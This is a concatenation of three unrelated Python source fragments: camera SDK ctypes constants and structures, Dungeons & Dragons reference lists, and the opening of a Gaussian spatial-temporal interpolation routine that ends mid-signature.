SCENE_CMD_GET_DEFAULT_PRESET = 4 # Get the default sensor scene preset
SCENE_INVALID = 0
SCENE_SENSOR_AUTOMATIC = 0x00000001
SCENE_SENSOR_PORTRAIT = 0x00000002
SCENE_SENSOR_SUNNY = 0x00000004
SCENE_SENSOR_ENTERTAINMENT = 0x00000008
SCENE_SENSOR_NIGHT = 0x00000010
SCENE_SENSOR_SPORTS = 0x00000040
SCENE_SENSOR_LANDSCAPE = 0x00000080
ZOOM_CMD_GET_CAPABILITIES = 0# Get the zoom capabilities.
ZOOM_CMD_DIGITAL_GET_NUM_LIST_ENTRIES = 1# Get the number of list entries.
ZOOM_CMD_DIGITAL_GET_LIST = 2# Get a list of supported zoom factors.
ZOOM_CMD_DIGITAL_SET_VALUE = 3# Set the digital zoom factor zoom factors.
ZOOM_CMD_DIGITAL_GET_VALUE = 4 # Get a current digital zoom factor.
ZOOM_CAP_INVALID = 0
ZOOM_CAP_DIGITAL_ZOOM = 0x00001
SHARPNESS_CMD_GET_CAPABILITIES = 0 # Get the sharpness capabilities
SHARPNESS_CMD_GET_VALUE = 1 # Get the current sharpness value
SHARPNESS_CMD_GET_MIN_VALUE = 2 # Get the minimum sharpness value
SHARPNESS_CMD_GET_MAX_VALUE = 3 # Get the maximum sharpness value
SHARPNESS_CMD_GET_INCREMENT = 4 # Get the sharpness increment
SHARPNESS_CMD_GET_DEFAULT_VALUE = 5 # Get the default sharpness value
SHARPNESS_CMD_SET_VALUE = 6 # Set the sharpness value
SHARPNESS_CAP_INVALID = 0x0000
SHARPNESS_CAP_SHARPNESS_SUPPORTED = 0x0001
SATURATION_CMD_GET_CAPABILITIES = 0 # Get the saturation capabilities
SATURATION_CMD_GET_VALUE = 1 # Get the current saturation value
SATURATION_CMD_GET_MIN_VALUE = 2 # Get the minimum saturation value
SATURATION_CMD_GET_MAX_VALUE = 3 # Get the maximum saturation value
SATURATION_CMD_GET_INCREMENT = 4 # Get the saturation increment
SATURATION_CMD_GET_DEFAULT = 5 # Get the default saturation value
SATURATION_CMD_SET_VALUE = 6 # Set the saturation value
SATURATION_CAP_INVALID = 0x0000
SATURATION_CAP_SATURATION_SUPPORTED = 0x0001
TRIGGER_DEBOUNCE_MODE_NONE = 0x0000
TRIGGER_DEBOUNCE_MODE_FALLING_EDGE = 0x0001
TRIGGER_DEBOUNCE_MODE_RISING_EDGE = 0x0002
TRIGGER_DEBOUNCE_MODE_BOTH_EDGES = 0x0004
TRIGGER_DEBOUNCE_MODE_AUTOMATIC = 0x0008
TRIGGER_DEBOUNCE_CMD_SET_MODE = 0 # Set a new trigger debounce mode
TRIGGER_DEBOUNCE_CMD_SET_DELAY_TIME = 1 # Set a new trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_SUPPORTED_MODES = 2 # Get the supported modes
TRIGGER_DEBOUNCE_CMD_GET_MODE = 3 # Get the current trigger debounce mode
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME = 4 # Get the current trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_MIN = 5 # Get the minimum value for the trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_MAX = 6 # Get the maximum value for the trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_INC = 7 # Get the increment of the trigger debounce delay time
TRIGGER_DEBOUNCE_CMD_GET_MODE_DEFAULT = 8 # Get the default trigger debounce mode
TRIGGER_DEBOUNCE_CMD_GET_DELAY_TIME_DEFAULT = 9 # Get the default trigger debounce delay time
RGB_COLOR_MODEL_SRGB_D50 = 0x0001
RGB_COLOR_MODEL_SRGB_D65 = 0x0002
RGB_COLOR_MODEL_CIE_RGB_E = 0x0004
RGB_COLOR_MODEL_ECI_RGB_D50 = 0x0008
RGB_COLOR_MODEL_ADOBE_RGB_D65 = 0x0010
COLOR_TEMPERATURE_CMD_SET_TEMPERATURE = 0 # Set a new color temperature
COLOR_TEMPERATURE_CMD_SET_RGB_COLOR_MODEL = 1 # Set a new RGB color model
COLOR_TEMPERATURE_CMD_GET_SUPPORTED_RGB_COLOR_MODELS = 2 # Get the supported RGB color models
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE = 3 # Get the current color temperature
COLOR_TEMPERATURE_CMD_GET_RGB_COLOR_MODEL = 4 # Get the current RGB color model
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_MIN = 5 # Get the minimum value for the color temperature
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_MAX = 6 # Get the maximum value for the color temperature
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_INC = 7 # Get the increment of the color temperature
COLOR_TEMPERATURE_CMD_GET_TEMPERATURE_DEFAULT = 8 # Get the default color temperature
COLOR_TEMPERATURE_CMD_GET_RGB_COLOR_MODEL_DEFAULT = 9 # Get the default RGB color model
class IS_POINT_2D(ctypes.Structure):
"""
:var INT s32X:
:var INT s32Y:
"""
_fields_ = [("s32X", wt.INT),
("s32Y", wt.INT)]
class IS_SIZE_2D(ctypes.Structure):
"""
:var INT s32Width:
:var INT s23Height:
"""
_fields_ = [("s32Width", wt.INT),
("s32Height", wt.INT)]
class IS_RECT(ctypes.Structure):
"""
:var INT s32X:
:var INT s32Y:
:var INT s32Width:
:var INT s23Height:
"""
_fields_ = [("s32X", wt.INT),
("s32Y", wt.INT),
("s32Width", wt.INT),
("s32Height", wt.INT)]
class AOI_SEQUENCE_PARAMS(ctypes.Structure):
"""
:var INT s32AOIIndex:
:var INT s32NumberOfCycleRepetitions:
:var INT s32X:
:var INT s32Y:
:var ctypes.c_double dblExposure:
:var INT s32Gain:
:var INT s32BinningMode:
:var INT s32SubsamplingMode:
:var INT s32DetachImageParameters:
:var ctypes.c_double dblScalerFactor:
:var BYTE[64] byReserved:
"""
_fields_ = [("s32AOIIndex", wt.INT),
("s32NumberOfCycleRepetitions", wt.INT),
("s32X", wt.INT),
("s32Y", wt.INT),
("dblExposure", ctypes.c_double),
("s32Gain", wt.INT),
("s32BinningMode", wt.INT),
("s32SubsamplingMode", wt.INT),
("s32DetachImageParameters", wt.INT),
("dblScalerFactor", ctypes.c_double),
("byReserved", wt.BYTE * 64)]
IS_DEVICE_FEATURE_CMD_GET_SUPPORTED_FEATURES = 1
IS_DEVICE_FEATURE_CMD_SET_LINESCAN_MODE = 2
IS_DEVICE_FEATURE_CMD_GET_LINESCAN_MODE = 3
IS_DEVICE_FEATURE_CMD_SET_LINESCAN_NUMBER = 4
IS_DEVICE_FEATURE_CMD_GET_LINESCAN_NUMBER = 5
IS_DEVICE_FEATURE_CMD_SET_SHUTTER_MODE = 6
IS_DEVICE_FEATURE_CMD_GET_SHUTTER_MODE = 7
IS_DEVICE_FEATURE_CMD_SET_PREFER_XS_HS_MODE = 8
IS_DEVICE_FEATURE_CMD_GET_PREFER_XS_HS_MODE = 9
IS_DEVICE_FEATURE_CMD_GET_DEFAULT_PREFER_XS_HS_MODE = 10
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_DEFAULT = 11
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE = 12
IS_DEVICE_FEATURE_CMD_SET_LOG_MODE = 13
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_VALUE_DEFAULT = 14
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_VALUE_RANGE = 15
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_VALUE = 16
IS_DEVICE_FEATURE_CMD_SET_LOG_MODE_MANUAL_VALUE = 17
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_GAIN_DEFAULT = 18
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_GAIN_RANGE = 19
IS_DEVICE_FEATURE_CMD_GET_LOG_MODE_MANUAL_GAIN = 20
IS_DEVICE_FEATURE_CMD_SET_LOG_MODE_MANUAL_GAIN = 21
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_ROLLING = 0x00000001
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_GLOBAL = 0x00000002
IS_DEVICE_FEATURE_CAP_LINESCAN_MODE_FAST = 0x00000004
IS_DEVICE_FEATURE_CAP_LINESCAN_NUMBER = 0x00000008
IS_DEVICE_FEATURE_CAP_PREFER_XS_HS_MODE = 0x00000010
IS_DEVICE_FEATURE_CAP_LOG_MODE = 0x00000020
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_ROLLING_GLOBAL_START = 0x00000040
IS_DEVICE_FEATURE_CAP_SHUTTER_MODE_GLOBAL_ALTERNATIVE_TIMING = 0x00000080
IS_LOG_MODE_FACTORY_DEFAULT = 0
IS_LOG_MODE_OFF = 1
IS_LOG_MODE_MANUAL = 2
class RANGE_OF_VALUES_U32(ctypes.Structure):
"""
:var UINT u32Minimum:
:var UINT u32Maximum:
:var UINT u32Increment:
:var UINT u32Default:
:var UINT u32Infinite:
"""
_fields_ = [("u32Minimum", wt.UINT),
("u32Maximum", wt.UINT),
("u32Increment", wt.UINT),
("u32Default", wt.UINT),
("u32Infinite", wt.UINT)]
TRANSFER_CAP_IMAGEDELAY = 0x01
TRANSFER_CAP_PACKETINTERVAL = 0x20
TRANSFER_CMD_QUERY_CAPABILITIES = 0
TRANSFER_CMD_SET_IMAGEDELAY_US = 1000
TRANSFER_CMD_SET_PACKETINTERVAL_US = 1005
TRANSFER_CMD_GET_IMAGEDELAY_US = 2000
TRANSFER_CMD_GET_PACKETINTERVAL_US = 2005
TRANSFER_CMD_GETRANGE_IMAGEDELAY_US = 3000
TRANSFER_CMD_GETRANGE_PACKETINTERVAL_US = 3005
TRANSFER_CMD_SET_IMAGE_DESTINATION = 5000
TRANSFER_CMD_GET_IMAGE_DESTINATION = 5001
TRANSFER_CMD_GET_IMAGE_DESTINATION_CAPABILITIES = 5002
IS_TRANSFER_DESTINATION_DEVICE_MEMORY = 1
IS_TRANSFER_DESTINATION_USER_MEMORY = 2
IS_BOOTBOOST_ID = wt.BYTE
IS_BOOTBOOST_ID_MIN = 1
IS_BOOTBOOST_ID_MAX = 254
IS_BOOTBOOST_ID_NONE = 0
IS_BOOTBOOST_ID_ALL = 255
# class IS_BOOTBOOST_IDLIST(ctypes.Structure):
# _fields_ = [("u32NumberOfEntries", wt.DWORD),
# ("aList", ctypes.POINTER(IS_BOOTBOOST_ID))]
def create_bootboost_idlist(numberOfEntries):
"""Returns an instance of the IS_BOOTBOOST_IDLIST structure having the properly scaled *aList* array.
:param ULONG numberOfEntries: Number of aList structures requested.
:returns: IS_BOOTBOOST_IDLIST
:var DWORD u32NumberOfEntries:
:var IS_BOOTBOOST_ID[numberOfEntries] aList:
"""
class IS_BOOTBOOST_IDLIST(ctypes.Structure):
_fields_ = [("u32NumberOfEntries", wt.DWORD),
("aList", IS_BOOTBOOST_ID * numberOfEntries)]
a_list = IS_BOOTBOOST_IDLIST()
a_list.u32NumberOfEntries = numberOfEntries
return a_list
IS_BOOTBOOST_IDLIST_HEADERSIZE = (ctypes.sizeof(wt.DWORD))
IS_BOOTBOOST_IDLIST_ELEMENTSIZE = (ctypes.sizeof(IS_BOOTBOOST_ID))
IS_BOOTBOOST_CMD_ENABLE = 0x00010001
IS_BOOTBOOST_CMD_DISABLE = 0x00010011
IS_BOOTBOOST_CMD_GET_ENABLED = 0x20010021
IS_BOOTBOOST_CMD_ADD_ID = 0x10100001
IS_BOOTBOOST_CMD_SET_IDLIST = 0x10100005
IS_BOOTBOOST_CMD_REMOVE_ID = 0x10100011
IS_BOOTBOOST_CMD_CLEAR_IDLIST = 0x00100015
IS_BOOTBOOST_CMD_GET_IDLIST = 0x30100021
IS_BOOTBOOST_CMD_GET_IDLIST_SIZE = 0x20100022
IPCONFIG_CAP_PERSISTENT_IP_SUPPORTED = 0x01
IPCONFIG_CAP_AUTOCONFIG_IP_SUPPORTED = 0x04
IPCONFIG_CMD_QUERY_CAPABILITIES = 0
IPCONFIG_CMD_SET_PERSISTENT_IP = 0x01010000
IPCONFIG_CMD_SET_AUTOCONFIG_IP = 0x01040000
IPCONFIG_CMD_SET_AUTOCONFIG_IP_BYDEVICE = 0x01040100
IPCONFIG_CMD_GET_PERSISTENT_IP = 0x02010000
IPCONFIG_CMD_GET_AUTOCONFIG_IP = 0x02040000
IPCONFIG_CMD_GET_AUTOCONFIG_IP_BYDEVICE = 0x02040100
IS_CONFIG_CPU_IDLE_STATES_BIT_AC_VALUE = 0x01 # !< Mains power
IS_CONFIG_CPU_IDLE_STATES_BIT_DC_VALUE = 0x02 # !< Battery power
IS_CONFIG_OPEN_MP_DISABLE = 0
IS_CONFIG_OPEN_MP_ENABLE = 1
IS_CONFIG_INITIAL_PARAMETERSET_NONE = 0
IS_CONFIG_INITIAL_PARAMETERSET_1 = 1
IS_CONFIG_INITIAL_PARAMETERSET_2 = 2
IS_CONFIG_CMD_GET_CAPABILITIES = 1 # !< Get supported configuration capabilities (bitmask of CONFIGURATION_CAPS)
IS_CONFIG_CPU_IDLE_STATES_CMD_GET_ENABLE = 2 # !< Get the current CPU idle states enable state (bitmask of CONFIGURATION_SEL)
IS_CONFIG_CPU_IDLE_STATES_CMD_SET_DISABLE_ON_OPEN = 4 # !< Disable migration to other CPU idle states (other than C0) if the first USB camera is being opened
IS_CONFIG_CPU_IDLE_STATES_CMD_GET_DISABLE_ON_OPEN = 5 # !< Get the current setting of the command IS_CPU_IDLE_STATES_CMD_SET_DISABLE_ON_OPEN
IS_CONFIG_OPEN_MP_CMD_GET_ENABLE = 6
IS_CONFIG_OPEN_MP_CMD_SET_ENABLE = 7
IS_CONFIG_OPEN_MP_CMD_GET_ENABLE_DEFAULT = 8
IS_CONFIG_INITIAL_PARAMETERSET_CMD_SET = 9
IS_CONFIG_INITIAL_PARAMETERSET_CMD_GET = 10
IS_CONFIG_CPU_IDLE_STATES_CAP_SUPPORTED = 0x00000001 # !< CPU idle state commands are supported by the SDK
IS_CONFIG_OPEN_MP_CAP_SUPPORTED = 0x00000002 # !< Open MP commands are supported by the SDK
IS_CONFIG_INITIAL_PARAMETERSET_CAP_SUPPORTED = 0x00000004 # !< Initial parameter set commands are supported by the SDK
IS_EXPOSURE_CMD_GET_CAPS = 1
IS_EXPOSURE_CMD_GET_EXPOSURE_DEFAULT = 2
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE_MIN = 3
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE_MAX = 4
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE_INC = 5
IS_EXPOSURE_CMD_GET_EXPOSURE_RANGE = 6
IS_EXPOSURE_CMD_GET_EXPOSURE = 7
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE_MIN = 8
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE_MAX = 9
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE_INC = 10
IS_EXPOSURE_CMD_GET_FINE_INCREMENT_RANGE = 11
IS_EXPOSURE_CMD_SET_EXPOSURE = 12
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE_MIN = 13
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE_MAX = 14
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE_INC = 15
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_RANGE = 16
IS_EXPOSURE_CMD_GET_LONG_EXPOSURE_ENABLE = 17
IS_EXPOSURE_CMD_SET_LONG_EXPOSURE_ENABLE = 18
IS_EXPOSURE_CMD_GET_DUAL_EXPOSURE_RATIO = 19
IS_EXPOSURE_CMD_SET_DUAL_EXPOSURE_RATIO = 20
IS_EXPOSURE_CAP_EXPOSURE = 0x00000001
IS_EXPOSURE_CAP_FINE_INCREMENT = 0x00000002
IS_EXPOSURE_CAP_LONG_EXPOSURE = 0x00000004
IS_EXPOSURE_CAP_DUAL_EXPOSURE = 0x00000008
IS_TRIGGER_CMD_GET_BURST_SIZE_SUPPORTED = 1
IS_TRIGGER_CMD_GET_BURST_SIZE_RANGE = 2
IS_TRIGGER_CMD_GET_BURST_SIZE = 3
IS_TRIGGER_CMD_SET_BURST_SIZE = 4
class IO_FLASH_PARAMS(ctypes.Structure):
"""
:var INT s32Delay:
:var UINT u32Duration:
"""
_fields_ = [("s32Delay", wt.INT),
("u32Duration", wt.UINT)]
class IO_PWM_PARAMS(ctypes.Structure):
"""
:var ctypes.c_double dblFrequency_Hz:
:var ctypes.c_double dblDutyCycle:
"""
_fields_ = [("dblFrequency_Hz", ctypes.c_double),
("dblDutyCycle", ctypes.c_double)]
class IO_GPIO_CONFIGURATION(ctypes.Structure):
"""
:var UINT u32Gpio:
:var UINT u32Caps:
:var UINT u32Configuration:
:var UINT u32State:
:var UINT[12] u32Reserved:
"""
_fields_ = [("u32Gpio", wt.UINT),
("u32Caps", wt.UINT),
("u32Configuration", wt.UINT),
("u32State", wt.UINT),
("u32Reserved", wt.UINT * 12)]
IO_LED_STATE_1 = 0
IO_LED_STATE_2 = 1
IO_FLASH_MODE_OFF = 0
IO_FLASH_MODE_TRIGGER_LO_ACTIVE = 1
IO_FLASH_MODE_TRIGGER_HI_ACTIVE = 2
IO_FLASH_MODE_CONSTANT_HIGH = 3
IO_FLASH_MODE_CONSTANT_LOW = 4
IO_FLASH_MODE_FREERUN_LO_ACTIVE = 5
IO_FLASH_MODE_FREERUN_HI_ACTIVE = 6
IS_FLASH_MODE_PWM = 0x8000
IO_FLASH_MODE_GPIO_1 = 0x0010
IO_FLASH_MODE_GPIO_2 = 0x0020
IO_FLASH_MODE_GPIO_3 = 0x0040
IO_FLASH_MODE_GPIO_4 = 0x0080
IO_FLASH_GPIO_PORT_MASK = (IO_FLASH_MODE_GPIO_1 | IO_FLASH_MODE_GPIO_2 | IO_FLASH_MODE_GPIO_3 | IO_FLASH_MODE_GPIO_4)
IO_GPIO_1 = 0x0001
IO_GPIO_2 = 0x0002
IO_GPIO_3 = 0x0004
IO_GPIO_4 = 0x0008
IS_GPIO_INPUT = 0x0001
IS_GPIO_OUTPUT = 0x0002
IS_GPIO_FLASH = 0x0004
IS_GPIO_PWM = 0x0008
IS_GPIO_COMPORT_RX = 0x0010
IS_GPIO_COMPORT_TX = 0x0020
IS_IO_CMD_GPIOS_GET_SUPPORTED = 1
IS_IO_CMD_GPIOS_GET_SUPPORTED_INPUTS = 2
IS_IO_CMD_GPIOS_GET_SUPPORTED_OUTPUTS = 3
IS_IO_CMD_GPIOS_GET_DIRECTION = 4
IS_IO_CMD_GPIOS_SET_DIRECTION = 5
IS_IO_CMD_GPIOS_GET_STATE = 6
IS_IO_CMD_GPIOS_SET_STATE = 7
IS_IO_CMD_LED_GET_STATE = 8
IS_IO_CMD_LED_SET_STATE = 9
IS_IO_CMD_LED_TOGGLE_STATE = 10
IS_IO_CMD_FLASH_GET_GLOBAL_PARAMS = 11
IS_IO_CMD_FLASH_APPLY_GLOBAL_PARAMS = 12
IS_IO_CMD_FLASH_GET_SUPPORTED_GPIOS = 13
IS_IO_CMD_FLASH_GET_PARAMS_MIN = 14
IS_IO_CMD_FLASH_GET_PARAMS_MAX = 15
IS_IO_CMD_FLASH_GET_PARAMS_INC = 16
IS_IO_CMD_FLASH_GET_PARAMS = 17
IS_IO_CMD_FLASH_SET_PARAMS = 18
IS_IO_CMD_FLASH_GET_MODE = 19
IS_IO_CMD_FLASH_SET_MODE = 20
IS_IO_CMD_PWM_GET_SUPPORTED_GPIOS = 21
IS_IO_CMD_PWM_GET_PARAMS_MIN = 22
IS_IO_CMD_PWM_GET_PARAMS_MAX = 23
IS_IO_CMD_PWM_GET_PARAMS_INC = 24
IS_IO_CMD_PWM_GET_PARAMS = 25
IS_IO_CMD_PWM_SET_PARAMS = 26
IS_IO_CMD_PWM_GET_MODE = 27
IS_IO_CMD_PWM_SET_MODE = 28
IS_IO_CMD_GPIOS_GET_CONFIGURATION = 29
IS_IO_CMD_GPIOS_SET_CONFIGURATION = 30
IS_IO_CMD_FLASH_GET_GPIO_PARAMS_MIN = 31
IS_IO_CMD_FLASH_SET_GPIO_PARAMS = 32
IS_AWB_CMD_GET_SUPPORTED_TYPES = 1
IS_AWB_CMD_GET_TYPE = 2
IS_AWB_CMD_SET_TYPE = 3
IS_AWB_CMD_GET_ENABLE = 4
IS_AWB_CMD_SET_ENABLE = 5
IS_AWB_CMD_GET_SUPPORTED_RGB_COLOR_MODELS = 6
IS_AWB_CMD_GET_RGB_COLOR_MODEL = 7
IS_AWB_CMD_SET_RGB_COLOR_MODEL = 8
IS_AWB_GREYWORLD = 0x0001
IS_AWB_COLOR_TEMPERATURE = 0x0002
IS_AUTOPARAMETER_DISABLE = 0
IS_AUTOPARAMETER_ENABLE = 1
IS_AUTOPARAMETER_ENABLE_RUNONCE = 2
class BUFFER_CONVERSION_PARAMS(ctypes.Structure):
"""
:var ctypes.c_char_p pSourceBuffer:
:var ctypes.c_char_p pDestBuffer:
:var INT nDestPixelFormat:
:var INT nDestPixelConverter:
:var INT nDestGamma:
:var INT nDestEdgeEnhancement:
:var INT nDestColorCorrectionMode:
:var INT nDestSaturationU:
:var INT nDestSaturationV:
:var BYTE[32] reserved:
"""
_fields_ = [("pSourceBuffer", ctypes.c_char_p),
("pDestBuffer", ctypes.c_char_p),
("nDestPixelFormat", wt.INT),
("nDestPixelConverter", wt.INT),
("nDestGamma", wt.INT),
("nDestEdgeEnhancement", wt.INT),
("nDestColorCorrectionMode", wt.INT),
("nDestSaturationU", wt.INT),
("nDestSaturationV", wt.INT),
("reserved", wt.BYTE * 32)]
IS_CONVERT_CMD_APPLY_PARAMS_AND_CONVERT_BUFFER = 1
IS_PARAMETERSET_CMD_LOAD_EEPROM = 1
IS_PARAMETERSET_CMD_LOAD_FILE = 2
IS_PARAMETERSET_CMD_SAVE_EEPROM = 3
IS_PARAMETERSET_CMD_SAVE_FILE = 4
IS_PARAMETERSET_CMD_GET_NUMBER_SUPPORTED = 5
IS_EDGE_ENHANCEMENT_CMD_GET_RANGE = 1
IS_EDGE_ENHANCEMENT_CMD_GET_DEFAULT = 2
IS_EDGE_ENHANCEMENT_CMD_GET = 3
IS_EDGE_ENHANCEMENT_CMD_SET = 4
IS_PIXELCLOCK_CMD_GET_NUMBER = 1
IS_PIXELCLOCK_CMD_GET_LIST = 2
IS_PIXELCLOCK_CMD_GET_RANGE = 3
IS_PIXELCLOCK_CMD_GET_DEFAULT = 4
IS_PIXELCLOCK_CMD_GET = 5
IS_PIXELCLOCK_CMD_SET = 6
class IMAGE_FILE_PARAMS(ctypes.Structure):
"""
:var ctypes.c_wchar_p pwchFileName:
:var UINT nFileType:
:var UINT nQuality:
:var ctypes.POINTER(ctypes.c_char_p) ppcImageMem:
:var ctypes.POINTER(wt.UINT) pnImageID:
:var BYTE[32] reserved:
"""
_fields_ = [("pwchFileName", ctypes.c_wchar_p),
("nFileType", wt.UINT),
("nQuality", wt.UINT),
("ppcImageMem", ctypes.POINTER(ctypes.c_char_p)),
("pnImageID", ctypes.POINTER(wt.UINT)),
("reserved", wt.BYTE * 32)]
IS_IMAGE_FILE_CMD_LOAD = 1
IS_IMAGE_FILE_CMD_SAVE = 2
class IS_RANGE_S32(ctypes.Structure):
"""
:var INT s32Min:
:var INT s32Max:
:var INT s32Inc:
"""
_fields_ = [("s32Min", wt.INT),
("s32Max", wt.INT),
("s32Inc", wt.INT)]
IS_AUTO_BLACKLEVEL_OFF = 0
IS_AUTO_BLACKLEVEL_ON = 1
IS_BLACKLEVEL_CAP_SET_AUTO_BLACKLEVEL = 1
IS_BLACKLEVEL_CAP_SET_OFFSET = 2
IS_BLACKLEVEL_CMD_GET_CAPS = 1
IS_BLACKLEVEL_CMD_GET_MODE_DEFAULT = 2
IS_BLACKLEVEL_CMD_GET_MODE = 3
IS_BLACKLEVEL_CMD_SET_MODE = 4
IS_BLACKLEVEL_CMD_GET_OFFSET_DEFAULT = 5
IS_BLACKLEVEL_CMD_GET_OFFSET_RANGE = 6
IS_BLACKLEVEL_CMD_GET_OFFSET = 7
IS_BLACKLEVEL_CMD_SET_OFFSET = 8
class MEASURE_SHARPNESS_AOI_INFO(ctypes.Structure):
"""
:var UINT u32NumberAOI:
:var UINT u32SharpnessValue:
:var IS_RECT rcAOI:
"""
_fields_ = [("u32NumberAOI", wt.UINT),
("u32SharpnessValue", wt.UINT),
("rcAOI", IS_RECT)]
IS_MEASURE_CMD_SHARPNESS_AOI_SET = 1
IS_MEASURE_CMD_SHARPNESS_AOI_INQUIRE = 2
IS_MEASURE_CMD_SHARPNESS_AOI_SET_PRESET = 3
IS_MEASURE_SHARPNESS_AOI_PRESET_1 = 1
IS_IMGBUF_DEVMEM_CMD_GET_AVAILABLE_ITERATIONS = 1
IS_IMGBUF_DEVMEM_CMD_GET_ITERATION_INFO = 2
IS_IMGBUF_DEVMEM_CMD_TRANSFER_IMAGE = 3
IS_IMGBUF_DEVMEM_CMD_RELEASE_ITERATIONS = 4
class ID_RANGE(ctypes.Structure):
"""
:var UINT u32First:
:var UINT u32Last:
"""
_fields_ = [("u32First", wt.UINT),
("u32Last", wt.UINT)]
class IMGBUF_ITERATION_INFO(ctypes.Structure):
"""
:var UINT u32IterationID:
:var ID_RANGE rangeImageID:
:var BYTE[52] bReserved:
"""
_fields_ = [("u32IterationID", wt.UINT),
("rangeImageID", ID_RANGE),
("bReserved", wt.BYTE * 52)]
class IMGBUF_ITERATION_INFO(ctypes.Structure):
"""
:var UINT u32IterationID:
:var UINT u32ImageID:
"""
_fields_ = [("u32IterationID", wt.UINT),
("u32ImageID", wt.UINT)]
|
from pprint import pprint
races = [
"dwarf",
"elf",
"halfling",
"human",
"dragonborn",
"gnome",
"half-elf",
"half-orc",
"tiefling"
]
classes = [
"artificer",
"barbarian",
"bard",
"cleric",
"druid",
"fighter",
"monk",
"paladin",
"ranger",
"rogue",
"sorcerer",
"warlock",
"wizard"
]
spell_classes = [
"artificer",
"bard",
"cleric",
"druid",
"paladin",
"ranger",
"sorcerer",
"warlock",
"wizard"
]
spell_levels = [
"cantrip",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9"
]
schools = [
"abjuration",
"conjuration",
"divination",
"evocation",
"enchantment",
"illusion",
"necromancy",
"transmutation"
]
casting_times = [
"1 action",
"1 bonus action",
"1 reaction",
"1 minute",
"10 minutes",
"1 hour",
"8 hours",
"12 hours",
"24 hours"
]
durations = [
"Instantaneous",
"1 round",
"6 rounds",
"1 minute",
"10 minutes",
"1 hour",
"2 hours",
"6 hours",
"8 hours",
"24 hours",
"1 day",
"7 days",
"10 days",
"30 days",
"Until dispelled",
"Special"
]
ranges = [
"Touch",
"5 feet",
"10 feet",
"15 feet",
"30 feet",
"60 feet",
"90 feet",
"100 feet",
"120 feet",
"150 feet",
"300 feet",
"500 feet",
"1 mile",
"5 miles",
"500 miles",
"Sight",
"Unlimited",
"Special"
]
shapes = [
"Line",
"Cone",
"Cube",
"Sphere",
"Hemisphere"
]
sources = [
"Player's Handbook",
"Elemental Evil",
"Xanathar's Guide to Everything",
"Lost Laboratory of Kwalish",
"Explorer's Guide to Wildemount",
"Tasha's Cauldron of Everything",
"Homebrew"
]
source_acronyms = {
"Player's Handbook": "PHB",
"Dungeon Master's Guide": "DMG",
"Elemental Evil": "EE",
"Sword Coast Adventurer's Guide": "SCAG",
"Xanathar's Guide to Everything": "XGtE",
"Lost Laboratory of Kwalish": "LLoK",
"Explorer's Guide to Wildemount": "EGtW",
"Tasha's Cauldron of Everything": "TCoE",
"Waterdeep: Dragon Heist": "WDH",
"Homebrew": "Home"
}
ability_scores = [
"Strength",
"Dexterity",
"Constitution",
"Intelligence",
"Wisdom",
"Charisma"
]
skills = [
("Acrobatics", "Dexterity"),
("Animal Handling", "Wisdom"),
("Arcana", "Intelligence"),
("Athletics", "Strength"),
("Deception", "Charisma"),
("History", "Intelligence"),
("Insight", "Wisdom"),
("Intimidation", "Charisma"),
("Investigation", "Intelligence"),
("Medicine", "Wisdom"),
("Nature", "Intelligence"),
("Perception", "Wisdom"),
("Performance", "Charisma"),
("Persuasion", "Charisma"),
("Religion", "Intelligence"),
("Sleight of Hand", "Dexterity"),
("Stealth", "Dexterity"),
("Survival", "Wisdom")
]
magic_item_types = [
"Armor",
"Potion",
"Ring",
"Rod",
"Scroll",
"Staff",
"Wand",
"Weapon",
"Wondrous Item"
]
magic_item_rarities = [
"Common",
"Uncommon",
"Rare",
"Very Rare",
"Legendary",
"Artifact"
]
magic_item_sources = [
"Dungeon Master's Guide",
"Xanathar's Guide to Everything",
"Tasha's Cauldron of Everything",
"Waterdeep: Dragon Heist",
"Homebrew"
]
|
#
# gaussInterp_slow routine -- Gaussian weighted smoothing in lat, lon, and time
#
# Based on <NAME>'s routines. Pure python implementation.
#
#
# Gaussian weighting = exp( vfactor * (((x - x0)/sx)^2 + ((y - y0)/sy)^2 + ((t - t0)/st)^2 ))
#
# where deltas are distances in lat, lon and time and sx, sy, st are one e-folding sigmas.
#
# Cutoffs for neighbors allowed in the interpolation are set by distance in lat/lon (see dlat/dlon);
# for time all epochs are included.
#
import sys
import numpy as np
from math import exp
from numba import jit, int32
VERBOSE = 0
def gaussInterp_slow(var, # bundle of input arrays: masked variable, coordinates
varNames, # list of names in order: primary variable, coordinates in order lat, lon, time
outlat, outlon, # output lat/lon coordinate vectors
wlat, wlon, # window of lat/lon neighbors to gaussian weight, expressed in delta lat (degrees)
slat, slon, stime, # sigma for gaussian downweighting with distance in lat, lon (deg), & time (days)
vfactor=-0.6931, # factor in front of gaussian expression
missingValue=-9999., # value to mark missing values in interp result
verbose=VERBOSE, # integer to set verbosity level
optimization='python'): # Mode of optimization, using 'fortran' or 'cython' or 'python'
